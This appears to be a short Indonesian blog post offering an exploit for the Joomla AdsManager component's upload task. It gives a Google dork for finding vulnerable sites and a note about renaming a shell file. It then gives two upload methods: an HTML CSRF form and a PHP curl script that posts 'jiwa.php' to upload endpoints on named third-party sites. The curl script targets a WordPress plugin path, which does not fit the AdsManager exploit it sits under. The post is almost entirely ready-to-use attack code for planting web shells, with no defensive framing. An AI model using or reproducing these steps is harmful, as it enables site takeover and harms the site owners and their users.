#- Dork : inurl:com_adsmanager
#- Exploit : /index.php?option=com_adsmanager&task=upload&tmpl=component
#- Vulnerable :
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}
*Note : Jangan lupa Edit Shellnya Shell.jpg
POC :
With CSRF / Uploadify
CSRF :
<form method="POST" action="http://www.muslimbizads.com/index.php?option=com_adsmanager&task=upload&tmpl=component"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
Uploadify :
$url = "http://shelbygrossman.com/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@jiwax.jpg",
"name" => "jiwa.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Tidak ada komentar:
Posting Komentar